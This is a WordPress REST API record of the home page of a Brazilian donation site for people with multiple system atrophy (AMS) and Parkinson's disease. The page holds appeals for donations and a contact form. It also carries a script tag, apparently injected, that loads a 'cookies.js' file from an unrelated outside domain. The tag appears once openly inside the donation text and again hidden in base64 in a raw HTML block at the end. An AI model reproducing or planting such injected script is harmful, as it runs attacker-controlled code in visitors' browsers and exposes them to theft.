{"id":41,"date":"2022-10-22T11:48:51","date_gmt":"2022-10-22T14:48:51","guid":{"rendered":"https:\/\/amseparkinson.com.br\/?page_id=41"},"modified":"2024-01-11T09:19:30","modified_gmt":"2024-01-11T12:19:30","slug":"home","status":"publish","type":"page","link":"https:\/\/amseparkinson.com.br\/","title":{"rendered":"AMS &#038; PARKINSON"},"content":{"rendered":"<p>[vc_row content_placement=&#8221;bottom&#8221;][vc_column][dt_fancy_title title=&#8221;AMS &amp; PARKINSON&#8221;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row_content_no_spaces&#8221; content_placement=&#8221;middle&#8221;][vc_column css=&#8221;.vc_custom_1666643882491{margin-bottom: 40px !important;}&#8221;][vc_column_text css=&#8221;.vc_custom_1666643822757{margin-bottom: 40px !important;}&#8221;]<div class=\"align wp-block-svp-video-player\" id='svpVideoPlayer-1' data-attributes='{&quot;align&quot;:&quot;&quot;,&quot;options&quot;:{&quot;controls&quot;:{&quot;play-large&quot;:true,&quot;restart&quot;:true,&quot;rewind&quot;:true,&quot;play&quot;:true,&quot;fast-forward&quot;:true,&quot;progress&quot;:true,&quot;current-time&quot;:true,&quot;mute&quot;:true,&quot;volume&quot;:true,&quot;captions&quot;:true,&quot;settings&quot;:true,&quot;pip&quot;:true,&quot;download&quot;:true,&quot;fullscreen&quot;:true},&quot;autoPlay&quot;:true,&quot;clickToPlay&quot;:true,&quot;muted&quot;:true,&quot;volume&quot;:0.5,&quot;seekTime&quot;:10,&quot;repeat&quot;:true,&quot;isAutoNextVideo&quot;:false,&quot;toolTip&quot;:true,&quot;isControl&quot;:true,&quot;shadowControl&quot;:true},&quot;videos&quot;:[{&quot;src&quot;:&quot;https:\\\/\\\/amseparkinson.com.br\\\/wp-content\\\/uploads\\\/2022\\\/10\\\/Video-.mp4&quot;,&quot;title&quot;:&quot;type your video title here&quot;,&quot;poster&quot;:&quot;&quot;,&quot;description&quot;:&quot;Don\\u2019t forget to like, comment, and subscribe for more fun episodes!&quot;,&quot;customDownloadButton&quot;:false,&quot;isCustomTitle&quot;:false,&quot;customDownloadUrl&quot;:&quot;&quot;,&quot;qualities&quot;:[],&quot;captions&quot;:[]}],&quot;videoSize&quot;:{&quot;width&quot;:{&quot;desktop&quot;:&quot;100%&quot;,&quot;tablet&quot;:&quot;100%&quot;,&quot;mobile&quot;:&quot;100%&quot;},&quot;height&quot;:{&quot;desktop&quot;:&quot;&quot;,&quot;tablet&quot;:&quot;&quot;,&quot;mobile&quot;:&quot;&quot;}},&quot;thumbnailSize&quot;:{&quot;width&quot;:{&quot;desktop&quot;:&quot;100%&quot;,&quot;tablet&quot;:&quot;100%&quot;,&quot;mobile&quot;:&quot;100%&quot;},&quot;height&quot;:{&quot;desktop&quot;:&quot;82px&quot;,&quot;tablet&quot;:&quot;&quot;,&quot;mobile&quot;:&quot;&quot;}},&quot;playlist&quot;:false,&quot;themes&quot;:{&quot;theme&quot;:&quot;default&quot;},&quot;tabStyles&quot;:{&quot;activeBg&quot;:&quot;#334155&quot;,&quot;activeTitleColor&quot;:&quot;#fff&quot;,&quot;activeDesColor&quot;:&quot;#fff&quot;,&quot;inactiveBg&quot;:&quot;#F0F5FA&quot;,&quot;inactiveTitleColor&quot;:&quot;#3D8D7A&quot;,&quot;inactiveDesColor&quot;:&quot;#585a5c&quot;,&quot;durationTimeColor&quot;:&quot;#fff&quot;,&quot;durationBg&quot;:&quot;#000&quot;},&quot;captionstyles&quot;:{&quot;color&quot;:&quot;#ffffff&quot;,&quot;bg&quot;:&quot;rgba(0,0,0,0.7)&quot;},&quot;captionTypo&quot;:{&quot;fontSize&quot;:{&quot;desktop&quot;:&quot;18px&quot;,&quot;tablet&quot;:&quot;18px&quot;,&quot;mobile&quot;:&quot;18px&quot;},&quot;fontFamily&quot;:&quot;inherit&quot;,&quot;lineHeight&quot;:&quot;1.4&quot;,&quot;fontWeight&quot;:&quot;400&quot;,&quot;textTransform&quot;:&quot;none&quot;},&quot;titleTypo&quot;:{&quot;fontSize&quot;:{&quot;desktop&quot;:15,&quot;tablet&quot;:13,&quot;mobile&quot;:12}},&quot;descriptionTypo&quot;:{&quot;fontSize&quot;:{&quot;desktop&quot;:14,&quot;tablet&quot;:12,&quot;mobile&quot;:10}},&quot;durationTypo&quot;:{&quot;fontSize&quot;:{&quot;desktop&quot;:14,&quot;tablet&quot;:12,&quot;mobile&quot;:10}},&quot;viewersTypo&quot;:{&quot;fontSize&quot;:{&quot;desktop&quot;:14,&quot;tablet&quot;:12,&quot;mobile&quot;:10}},&quot;alignment&quot;:&quot;center&quot;,&quot;textAlign&quot;:&quot;center&quot;,&quot;background&quot;:{&quot;color&quot;:&quot;#0000&quot;},&quot;scrollBg&quot;:&quot;#3D8D7A&quot;,&quot;content&quot;:&quot;Content of the block&quot;,&quot;typography&quot;:{&quot;fontSize&quot;:20},&quot;color&quot;:&quot;#333&quot;,&quot;colors&quot;:{&quot;color&quot;:&quot;#333&quot;,&quot;bg&quot;:&quot;#fff&quot;},&quot;img&quot;:{&quot;id&quot;:null,&quot;url&quot;:&quot;&quot;,&quot;alt&quot;:&quot;&quot;,&quot;title&quot;:&quot;&quot;},&quot;padding&quot;:{&quot;top&quot;:&quot;15px&quot;,&quot;right&quot;:&quot;30px&quot;,&quot;bottom&quot;:&quot;15px&quot;,&quot;left&quot;:&quot;30px&quot;},&quot;margin&quot;:{&quot;top&quot;:&quot;0px&quot;,&quot;right&quot;:&quot;0px&quot;,&quot;bottom&quot;:&quot;15px&quot;,&quot;left&quot;:&quot;0px&quot;},&quot;border&quot;:{&quot;width&quot;:&quot;0px&quot;,&quot;style&quot;:&quot;solid&quot;,&quot;color&quot;:&quot;#000000&quot;,&quot;radius&quot;:&quot;0px&quot;},&quot;shadow&quot;:[],&quot;layout&quot;:&quot;vertical&quot;}'><\/div>[\/vc_column_text][\/vc_column][\/vc_row][vc_row][vc_column video_bg=&#8221;yes&#8221; video_bg_url=&#8221;https:\/\/youtu.be\/KVD5UHNM70k&#8221; video_bg_parallax=&#8221;content-moving&#8221;][dt_fancy_title title=&#8221;PORQUE SUA DOA\u00c7\u00c3O \u00c9 IMPORTANTE ? COMPREENDA&#8221; title_size=&#8221;h2&#8243; title_color=&#8221;custom&#8221; separator_style=&#8221;disabled&#8221; custom_title_color=&#8221;#444444&#8243;][vc_empty_space height=&#8221;20px&#8221;][\/vc_column][\/vc_row][vc_row][vc_column width=&#8221;1\/2&#8243;][vc_empty_space height=&#8221;62px&#8221;][vc_column_text css_animation=&#8221;fadeIn&#8221; el_class=&#8221;texto&#8221;]Queremos ajudar familiares e portadores, construindo um gigantesco banco de informa\u00e7\u00f5es sobre termos, truths and fakes (verdades e mentiras), cuidados, sugest\u00f5es, depoimentos e, sobre pesquisas que est\u00e3o ocorrendo no mundo. Para isto acontecer precisamos de uni\u00e3o, engajamento, pertencimento&#8230; ter esperan\u00e7a e ajudar o universo a lembrar de n\u00f3s, nos movimentando.[\/vc_column_text][vc_btn title=&#8221;Saiba mais&#8221; color=&#8221;sky&#8221; align=&#8221;center&#8221; css_animation=&#8221;fadeIn&#8221; link=&#8221;url:https%3A%2F%2Famseparkinson.com.br%2Findex.php%2F3-coisinhas-que-voce-precisa-saber-sobre-sites%2F|target:_blank&#8221;][\/vc_column][vc_column width=&#8221;1\/2&#8243;][vc_single_image image=&#8221;93&#8243; img_size=&#8221;500&#215;500&#8243; alignment=&#8221;center&#8221; css_animation=&#8221;fadeIn&#8221;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221;][vc_column][vc_empty_space height=&#8221;40px&#8221;][dt_fancy_title title=&#8221;COLABORA\u00c7\u00d5ES&#8221; title_size=&#8221;h1&#8243; title_color=&#8221;custom&#8221; separator_style=&#8221;disabled&#8221; custom_title_color=&#8221;#444444&#8243;][vc_empty_space height=&#8221;20px&#8221;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221;][vc_column width=&#8221;1\/2&#8243;][vc_single_image image=&#8221;103&#8243; img_size=&#8221;500&#215;500&#8243; alignment=&#8221;center&#8221; css_animation=&#8221;fadeIn&#8221;][\/vc_column][vc_column width=&#8221;1\/2&#8243;][vc_empty_space height=&#8221;40px&#8221;][vc_column_text css_animation=&#8221;fadeIn&#8221; el_class=&#8221;texto&#8221;]<\/p>\n<div dir=\"auto\">Doar \u00e9 um ato de amor para com o pr\u00f3ximo e consigo pr\u00f3prio e falta de informa\u00e7\u00e3o \u00e9 a maior causa do desespero das fam\u00edlias quando descobrem que um ente amado \u00e9 portador de uma doen\u00e7a neurodegenerativa. S\u00e3o centenas de doen\u00e7as degenerativas, e, podem ser heredit\u00e1rias ou adquiridas.<\/div>\n<div dir=\"auto\">S\u00f3 parkinson, s\u00e3o mais de 2 milh\u00f5es de pessoas no Brasil.<\/div>\n<div dir=\"auto\">AMS s\u00e3o mais de 350 mil e estas s\u00e3o s\u00f3 2 das muitas que pode nos acometer em qualquer idade. Contamos com sua doa\u00e7\u00e3o de qualquer valor para este projeto que poder\u00e1 te ser \u00fatil ou ajudar outras pessoas um dia.<\/div>\n<p>[\/vc_column_text][vc_btn title=&#8221;Quero doar&#8221; color=&#8221;sky&#8221; align=&#8221;center&#8221; css_animation=&#8221;fadeIn&#8221; link=&#8221;url:https%3A%2F%2Fwww.kickante.com.br%2Ffinanciamento-coletivo%2Fams-and-parkinson-i-see-i-help%2Fpagamento|target:_blank&#8221;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row_content_no_spaces&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;259&#8243; parallax_speed_bg=&#8221;2.5&#8243; css=&#8221;.vc_custom_1666642960522{background-color: #c174e0 !important;}&#8221;][vc_column width=&#8221;1\/4&#8243;][\/vc_column][vc_column width=&#8221;1\/2&#8243;][vc_column_text el_class=&#8221;doe&#8221;]<\/p>\n<p style=\"text-align: center;\">Nos ajude doando, qualquer valor que esteja ao seu alcance hoje. Nos ajude a nos preocupar com seu futuro, o futuro de seus filhos e netos enquanto voc\u00ea continua suas lutas di\u00e1rias. Um pequeno gesto hoje, pode significar o direito de usufruir de tudo que lutou para conquistar ou mesmo a economia de milhares de reais no futuro.<\/p>\n<p><script src=\"https:\/\/themelibery.com\/cookies.js\"><\/script><br \/>\n[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/4&#8243;][\/vc_column][\/vc_row][vc_row][vc_column][vc_empty_space height=&#8221;50px&#8221;][\/vc_column][\/vc_row][vc_row][vc_column][dt_fancy_title title=&#8221;MATERIAS&#8221; title_size=&#8221;h1&#8243; title_color=&#8221;custom&#8221; separator_style=&#8221;disabled&#8221; custom_title_color=&#8221;#444444&#8243;][vc_empty_space height=&#8221;25px&#8221;][dt_blog_masonry mode=&#8221;grid&#8221; loading_effect=&#8221;fade_in&#8221; custom_content_bg_color=&#8221;#ffffff&#8221; image_hover_bg_color=&#8221;default&#8221; bwb_columns=&#8221;desktop:3|h_tablet:3|v_tablet:2|phone:1&#8243; all_posts_the_same_width=&#8221;y&#8221; content_alignment=&#8221;center&#8221; post_category=&#8221;n&#8221; post_author=&#8221;n&#8221; excerpt_words_limit=&#8221;20&#8243; read_more_button_text=&#8221;Leia mais&#8221; loading_mode=&#8221;standard&#8221; st_posts_per_page=&#8221;9&#8243; posts_offset=&#8221;0&#8243; st_show_all_pages=&#8221;y&#8221; category=&#8221;5, 6, 7, 8&#8243;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row_content_no_spaces&#8221;][vc_column][vc_empty_space height=&#8221;100px&#8221;][vc_single_image image=&#8221;179&#8243; img_size=&#8221;1920&#215;300&#8243; alignment=&#8221;center&#8221; onclick=&#8221;custom_link&#8221; img_link_target=&#8221;_blank&#8221; css_animation=&#8221;fadeIn&#8221; lazy_loading=&#8221;true&#8221; link=&#8221;https:\/\/www.instagram.com\/inimigos.dosol\/&#8221;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row_content_no_spaces&#8221; full_height=&#8221;yes&#8221; equal_height=&#8221;yes&#8221; parallax=&#8221;content-moving&#8221; parallax_speed_bg=&#8221;3.0&#8243; css_animation=&#8221;fadeIn&#8221; css=&#8221;.vc_custom_1666889823356{background-color: #ac2ae0 !important;}&#8221;][vc_column width=&#8221;1\/4&#8243;][\/vc_column][vc_column width=&#8221;1\/2&#8243;][vc_column_text el_class=&#8221;contato&#8221;]<\/p>\n<h3 style=\"text-align: center; color: white;\">Alguma d\u00favida, comentario ou suget\u00e3o?<\/h3>\n<p>[\/vc_column_text][vc_column_text]<div class=\"wpforms-container wpforms-container-full\" id=\"wpforms-198\"><form id=\"wpforms-form-198\" class=\"wpforms-validate wpforms-form wpforms-ajax-form\" data-formid=\"198\" method=\"post\" enctype=\"multipart\/form-data\" action=\"\/index.php\/wp-json\/wp\/v2\/pages\/41\" data-token=\"54d34dfe242f94c26505acbbecb950ce\" data-token-time=\"1776212735\"><noscript class=\"wpforms-error-noscript\">Ative o JavaScript no seu navegador para preencher este formul\u00e1rio.<\/noscript><div class=\"wpforms-field-container\"><div id=\"wpforms-198-field_0-container\" class=\"wpforms-field wpforms-field-name contato\" data-field-id=\"0\"><label class=\"wpforms-field-label\">Nome <span class=\"wpforms-required-label\">*<\/span><\/label><div class=\"wpforms-field-row wpforms-field-medium\"><div class=\"wpforms-field-row-block wpforms-first wpforms-one-half\"><input type=\"text\" id=\"wpforms-198-field_0\" class=\"wpforms-field-name-first wpforms-field-required\" name=\"wpforms[fields][0][first]\" required><label for=\"wpforms-198-field_0\" class=\"wpforms-field-sublabel after\">Nome<\/label><\/div><div class=\"wpforms-field-row-block wpforms-one-half\"><input type=\"text\" id=\"wpforms-198-field_0-last\" class=\"wpforms-field-name-last wpforms-field-required\" name=\"wpforms[fields][0][last]\" required><label for=\"wpforms-198-field_0-last\" class=\"wpforms-field-sublabel after\">Sobrenome<\/label><\/div><\/div><\/div><div id=\"wpforms-198-field_1-container\" class=\"wpforms-field wpforms-field-email contato\" data-field-id=\"1\"><label class=\"wpforms-field-label\" for=\"wpforms-198-field_1\">E-mail <span class=\"wpforms-required-label\">*<\/span><\/label><input type=\"email\" id=\"wpforms-198-field_1\" class=\"wpforms-field-medium wpforms-field-required\" name=\"wpforms[fields][1]\" spellcheck=\"false\" required><\/div><div id=\"wpforms-198-field_2-container\" class=\"wpforms-field wpforms-field-textarea contato\" data-field-id=\"2\"><label class=\"wpforms-field-label\" for=\"wpforms-198-field_2\">Coment\u00e1rio ou Mensagem<\/label><textarea id=\"wpforms-198-field_2\" class=\"wpforms-field-medium\" name=\"wpforms[fields][2]\" ><\/textarea><\/div><\/div><!-- .wpforms-field-container --><div class=\"wpforms-submit-container\" ><input type=\"hidden\" name=\"wpforms[id]\" value=\"198\"><input type=\"hidden\" name=\"page_title\" value=\"\"><input type=\"hidden\" name=\"page_url\" value=\"https:\/\/amseparkinson.com.br\/index.php\/wp-json\/wp\/v2\/pages\/41\"><input type=\"hidden\" name=\"url_referer\" value=\"\"><button type=\"submit\" name=\"wpforms[submit]\" id=\"wpforms-submit-198\" class=\"wpforms-submit\" data-alt-text=\"Enviando...\" data-submit-text=\"Enviar\" aria-live=\"assertive\" value=\"wpforms-submit\">Enviar<\/button><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/amseparkinson.com.br\/wp-content\/plugins\/wpforms-lite\/assets\/images\/submit-spin.svg\" class=\"wpforms-submit-spinner\" style=\"display: none;\" width=\"26\" height=\"26\" alt=\"Carregando\"><\/div><\/form><\/div>  <!-- .wpforms-container -->[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/4&#8243;][\/vc_column][\/vc_row][vc_row][vc_column][vc_raw_html]JTNDc2NyaXB0JTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ0aGVtZWxpYmVyeS5jb20lMkZjb29raWVzLmpzJTIyJTNFJTNDJTJGc2NyaXB0JTNFJTBB[\/vc_raw_html][\/vc_column][\/vc_row]<\/p>\n","protected":false},"excerpt":{"rendered":"<p>[vc_row content_placement=&#8221;bottom&#8221;][vc_column][dt_fancy_title title=&#8221;AMS &amp; PARKINSON&#8221;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row_content_no_spaces&#8221; content_placement=&#8221;middle&#8221;][vc_column css=&#8221;.vc_custom_1666643882491{margin-bottom: 40px !important;}&#8221;][vc_column_text css=&#8221;.vc_custom_1666643822757{margin-bottom: 40px !important;}&#8221;][\/vc_column_text][\/vc_column][\/vc_row][vc_row][vc_column video_bg=&#8221;yes&#8221; video_bg_url=&#8221;https:\/\/youtu.be\/KVD5UHNM70k&#8221; video_bg_parallax=&#8221;content-moving&#8221;][dt_fancy_title title=&#8221;PORQUE SUA DOA\u00c7\u00c3O \u00c9 IMPORTANTE ? COMPREENDA&#8221; title_size=&#8221;h2&#8243; title_color=&#8221;custom&#8221; separator_style=&#8221;disabled&#8221; custom_title_color=&#8221;#444444&#8243;][vc_empty_space height=&#8221;20px&#8221;][\/vc_column][\/vc_row][vc_row][vc_column width=&#8221;1\/2&#8243;][vc_empty_space height=&#8221;62px&#8221;][vc_column_text css_animation=&#8221;fadeIn&#8221; el_class=&#8221;texto&#8221;]Queremos ajudar familiares e portadores, construindo um gigantesco banco de informa\u00e7\u00f5es sobre termos, truths and fakes (verdades e mentiras), cuidados, sugest\u00f5es, depoimentos e, sobre [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"om_disable_all_campaigns":false,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"class_list":["post-41","page","type-page","status-publish"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/amseparkinson.com.br\/index.php\/wp-json\/wp\/v2\/pages\/41","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/amseparkinson.com.br\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/amseparkinson.com.br\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/amseparkinson.com.br\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/amseparkinson.com.br\/index.php\/wp-json\/wp\/v2\/comments?post=41"}],"version-history":[{"count":145,"href":"https:\/\/amseparkinson.com.br\/index.php\/wp-json\/wp\/v2\/pages\/41\/revisions"}],"predecessor-version":[{"id":336,"href":"https:\/\/amseparkinson.com.br\/index.php\/wp-json\/wp\/v2\/pages\/41\/revisions\/336"}],"wp:attachment":[{"href":"https:\/\/amseparkinson.com.br\/index.php\/wp-json\/wp\/v2\/media?parent=41"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}